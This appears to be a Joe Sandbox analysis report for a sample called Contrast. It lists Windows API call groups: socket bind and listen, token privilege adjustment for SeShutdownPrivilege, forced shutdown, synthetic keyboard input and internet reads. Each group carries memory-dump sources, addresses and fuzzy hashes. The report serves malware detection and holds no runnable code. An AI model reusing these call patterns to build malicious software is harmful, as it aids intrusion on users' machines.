                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 2185952417-438819550
                                                                                                                                        • Opcode ID: 2182757530b54baf0dcd0dccfb5dfc8f24c9836e561ac5f93479ed274fe1ffd6
                                                                                                                                        • Instruction ID: f3274901825b6d1805ab3e412c73a6b9b0c085476986585435e02bcdbad5f7a8
                                                                                                                                        • Opcode Fuzzy Hash: 2182757530b54baf0dcd0dccfb5dfc8f24c9836e561ac5f93479ed274fe1ffd6
                                                                                                                                        • Instruction Fuzzy Hash: 3F419F7190021A9FCF14DF64DC59AEEBFB4FF19310F148466E818A2290EB309E84DB90
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00569399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005693E3
                                                                                                                                          • Part of subcall function 00569399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00569410
                                                                                                                                          • Part of subcall function 00569399: GetLastError.KERNEL32 ref: 0056941D
                                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 005757B4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                                                                        • API String ID: 2234035333-194228
                                                                                                                                        • Opcode ID: d88fd8097f284b0c89559c43766cd455cb5291b66ee93e47ab83ac32a56cfef5
                                                                                                                                        • Instruction ID: fa1affca8a1a78ade831290134af596b55941ac8f4e10f6049a8ce7b0ba3980a
                                                                                                                                        • Opcode Fuzzy Hash: d88fd8097f284b0c89559c43766cd455cb5291b66ee93e47ab83ac32a56cfef5
                                                                                                                                        • Instruction Fuzzy Hash: 6A01D431650712EAE76C62A4BC8BBBA7F5CFB057D0F248929F81BD20D2F9905C04A160
                                                                                                                                        APIs
                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 005869C7
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 005869D6
                                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 005869F2
                                                                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00586A01
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00586A1B
                                                                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00586A2F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279440585-0
                                                                                                                                        • Opcode ID: 9bcbd72bdf93525b05ba4eb261f048cefd49efa3436c02a2e347e7fedadf26c4
                                                                                                                                        • Instruction ID: 9371eddda08aa659897f3089d90104bc96b7e0ab9b8edc07d16ffc930b5113e9
                                                                                                                                        • Opcode Fuzzy Hash: 9bcbd72bdf93525b05ba4eb261f048cefd49efa3436c02a2e347e7fedadf26c4
                                                                                                                                        • Instruction Fuzzy Hash: AC21D070600606DFDB00FF64D889A6EBBA9FF89720F108559E856B73D1CB70AC45DB90
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                                                                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00511DD6
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00511E2A
                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00511E3D
                                                                                                                                          • Part of subcall function 0051166C: DefDlgProcW.USER32(?,00000020,?), ref: 005116B4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ColorProc$LongWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3744519093-0
                                                                                                                                        • Opcode ID: aa4bba782499030342b9b423fe413b1de5e6f1140c239bb56005d6a94f7994a1
                                                                                                                                        • Instruction ID: afbbfe3199e84d639927417130b5f1f54880964def5c0217eb83a64ef8f41a63
                                                                                                                                        • Opcode Fuzzy Hash: aa4bba782499030342b9b423fe413b1de5e6f1140c239bb56005d6a94f7994a1
                                                                                                                                        • Instruction Fuzzy Hash: 9DA15B74106C05BAFA286B696C89EFB3D5DFB85345F10098AF602C61C1DB21DDC1D27D
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0057C329
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057C359
                                                                                                                                        • _wcscmp.LIBCMT ref: 0057C36E
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0057C37F
                                                                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0057C3AF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2387731787-0
                                                                                                                                        • Opcode ID: 141baa423ca8c3e9ab539a90c38fca644e58a76b6418aca604eeca416e0561cc
                                                                                                                                        • Instruction ID: 0df7bb70fbd7fbc17642bda603d87cabe836c24e6f199d1a169b4e0cfe789755
                                                                                                                                        • Opcode Fuzzy Hash: 141baa423ca8c3e9ab539a90c38fca644e58a76b6418aca604eeca416e0561cc
                                                                                                                                        • Instruction Fuzzy Hash: 45518B756046028FD714DF68E494EAABBE4FF4A310F108A5DE95A8B3A1DB30ED04DB91
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00588475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005884A0
                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00586E89
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00586EB2
                                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00586EEB
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00586EF8
                                                                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00586F0C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 99427753-0
                                                                                                                                        • Opcode ID: 58c02dae7cc0c54dbfe996dca1a93a7b56252d245c98b33879a18af47c42e112
                                                                                                                                        • Instruction ID: 8f15c8ed51cd510deabcea2d6c7a5ef33c6c9739082813e7b46ab166f049e5de
                                                                                                                                        • Opcode Fuzzy Hash: 58c02dae7cc0c54dbfe996dca1a93a7b56252d245c98b33879a18af47c42e112
                                                                                                                                        • Instruction Fuzzy Hash: B041E675600201AFEB10BF64DC8AFBE7BA8FB89714F048458F915AB3C2DA749D408F91
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 292994002-0
                                                                                                                                        • Opcode ID: e343c40e486cd584a9a260f264fec6214d05d9620f0baf9a87a5ba38a5df22b8
                                                                                                                                        • Instruction ID: 59ea6035214cfce3ddd0ffaaeef29940642b700752d76b8b805101a9dbfad4cb
                                                                                                                                        • Opcode Fuzzy Hash: e343c40e486cd584a9a260f264fec6214d05d9620f0baf9a87a5ba38a5df22b8
                                                                                                                                        • Instruction Fuzzy Hash: 901104727009129FFB225F269C84A6E7F98FF85721B004529F806D7241EB30ED51CBE4
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LocalTime__swprintf
                                                                                                                                        • String ID: %.3d$WIN_XPe
                                                                                                                                        • API String ID: 2070861257-2409531811
                                                                                                                                        • Opcode ID: afcdcc48adf38bdfa623819069ea65d133d338f1527dc870bfae5c17291e86c7
                                                                                                                                        • Instruction ID: af7d12bb7aaa254c8cc09232d887190ef6ee5f75387d420131030ed332e05b85
                                                                                                                                        • Opcode Fuzzy Hash: afcdcc48adf38bdfa623819069ea65d133d338f1527dc870bfae5c17291e86c7
                                                                                                                                        • Instruction Fuzzy Hash: 6AD01271858119EACB149A90C95DEF9BF7CBB08302F501C53FD06A20E0E335978CAA22
                                                                                                                                        APIs
                                                                                                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00581ED6,00000000), ref: 00582AAD
                                                                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00582AE4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 599397726-0
                                                                                                                                        • Opcode ID: b25eeaf75f9ec4edf1d281fe06afada93c1f288302bdb8aec26eb028b36944b7
                                                                                                                                        • Instruction ID: bea327f60496bbb2dd6b78d8aa84c38300edafd9ad456317843bbdad472a9a54
                                                                                                                                        • Opcode Fuzzy Hash: b25eeaf75f9ec4edf1d281fe06afada93c1f288302bdb8aec26eb028b36944b7
                                                                                                                                        • Instruction Fuzzy Hash: 4141D571604209FFEB24EE54CC85EBBBFACFF40714F10441AFA05B6181EAB19E419760
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00530FE6: std::exception::exception.LIBCMT ref: 0053101C
                                                                                                                                          • Part of subcall function 00530FE6: __CxxThrowException@8.LIBCMT ref: 00531031
                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005693E3
                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00569410
                                                                                                                                        • GetLastError.KERNEL32 ref: 0056941D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1922334811-0
                                                                                                                                        • Opcode ID: 38e3d31f623e61cc7053f699ee3acd71cc821892cd944f2b53e5bebc1276e961
                                                                                                                                        • Instruction ID: 960d2692027cdc8a03f60e882a661c53f081388c0c4aa052625d3eba7c405506
                                                                                                                                        • Opcode Fuzzy Hash: 38e3d31f623e61cc7053f699ee3acd71cc821892cd944f2b53e5bebc1276e961
                                                                                                                                        • Instruction Fuzzy Hash: 5F1151B1518305AFD728DF64DC89D2BBBBCFB44711B20852EF45997291EB70AC45CB60
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00574271
                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 005742B2
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 005742BD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 33631002-0
                                                                                                                                        • Opcode ID: 1f7007f50ccbf2390d805a7d42f9f42b7df152291efea8a8b43646ddcf007ebc
                                                                                                                                        • Instruction ID: b20ee65bf7f7dee4c9a23d7cb1a33bab5c67149d95b722e0f6417ecb94044b2d
                                                                                                                                        • Opcode Fuzzy Hash: 1f7007f50ccbf2390d805a7d42f9f42b7df152291efea8a8b43646ddcf007ebc
                                                                                                                                        • Instruction Fuzzy Hash: 5F115E75E01228BFDB108FA5EC44BAFBFBCEB45B60F108156FD08E7290C6705A059BA1
                                                                                                                                        APIs
                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00574F45
                                                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00574F5C
                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 00574F6C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3429775523-0
                                                                                                                                        • Opcode ID: 32aacb0a264b88d606d3689b4bc439399ed78854bdc4c4986ca4f81b55300d1a
                                                                                                                                        • Instruction ID: 1c1ee73086f3276e8fde926943583e117586b7cb0c20c7e3f85de1bfb35ea8de
                                                                                                                                        • Opcode Fuzzy Hash: 32aacb0a264b88d606d3689b4bc439399ed78854bdc4c4986ca4f81b55300d1a
                                                                                                                                        • Instruction Fuzzy Hash: DCF03775A1120CBFDB00DFE09C89AAEBBB8FB08301F4044A9A901E2280E7346A089B50
                                                                                                                                        APIs
                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00571B01
                                                                                                                                        • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00571B14
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3536248340-0
                                                                                                                                        • Opcode ID: 7046bbab83259e1cd36bcbac35d3db46eca683a1612d06670ae2623bcbd4446f
                                                                                                                                        • Instruction ID: ad67c398e3eb7638e99d144ff047f7f85824877a27f3a70f606631fef3c4f2c3
                                                                                                                                        • Opcode Fuzzy Hash: 7046bbab83259e1cd36bcbac35d3db46eca683a1612d06670ae2623bcbd4446f
                                                                                                                                        • Instruction Fuzzy Hash: CDF0497191020DABDB14CFA4D805BFE7BB4FF18315F00804AF95996292D3799615EF94
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00589B52,?,005A098C,?), ref: 0057A6DA
                                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00589B52,?,005A098C,?), ref: 0057A6EC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3479602957-0
                                                                                                                                        • Opcode ID: a5df0effaf1d4c5cb57c96a64973e2aa3ba86d741d70014b881dd34c4b04d51b
                                                                                                                                        • Instruction ID: b6792a9f221b81e599a47165a5b501224a797ac6dd229ec1e27cb9fa3141319b
                                                                                                                                        • Opcode Fuzzy Hash: a5df0effaf1d4c5cb57c96a64973e2aa3ba86d741d70014b881dd34c4b04d51b
                                                                                                                                        • Instruction Fuzzy Hash: A8F0823551422EBBDB20AFA4DC48FEA7B6CFF19761F008156B91896181D6309944DBE1
                                                                                                                                        APIs
                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00568F27), ref: 00568DFE
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00568F27), ref: 00568E10
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 81990902-0
                                                                                                                                        • Opcode ID: 720df7b23e4d143ab3911b14ec81c0f803c68a716dcef42629b472d7b1bcd597
                                                                                                                                        • Instruction ID: cc85d22df4e0d7444a520897f4a5b7aa870617fea3038aff1c3317cbb732ff23
                                                                                                                                        • Opcode Fuzzy Hash: 720df7b23e4d143ab3911b14ec81c0f803c68a716dcef42629b472d7b1bcd597
                                                                                                                                        • Instruction Fuzzy Hash: F7E0BF75014611EFE7252B60EC0DD777BADFB04311B148919F455804B0DB626C94DB50
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00538F87,?,?,?,00000001), ref: 0053A38A
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0053A393
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                        • Opcode ID: 664a5a75ae3dfc09ab23da50a4b997cf7ff40be1ac79b3a683e3e545b68532f2
                                                                                                                                        • Instruction ID: 2c49651d7f6070359c07edbd84189f3a7dbf0addc6df89960c80203f11c136ba
